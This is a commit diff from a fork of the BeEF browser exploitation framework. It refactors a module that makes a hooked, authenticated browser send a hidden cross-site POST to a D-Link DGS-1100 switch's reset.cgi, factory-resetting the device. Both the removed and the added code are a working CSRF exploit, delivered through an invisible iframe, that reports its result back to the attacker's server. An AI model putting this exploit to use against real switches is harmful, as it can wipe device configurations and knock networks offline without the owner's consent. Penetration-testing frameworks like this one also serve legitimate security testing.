Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adjusting to use XsrfForm

Browse Source
This commit is contained in:
Nicholas Starke
2017-02-25 08:08:37 -06:00
parent 14d60c57d8
commit f3b797475c
1 changed files with 3 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
View File

@@ -8,22 +8,9 @@ beef.execute(function() {
// Hooked browser must be authenticated to switch.
var base = '<%= @base %>';
var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', base + "/cgi/reset.cgi");
form.setAttribute('method', 'POST');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'reset');
input.setAttribute('value', 1);
form.appendChild(input);
dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
form.submit();
var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/reset.cgi', 'POST', 'application/x-www-form-urlencoded', [
{ type: 'hidden', name: 'reset', value: 1 }
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");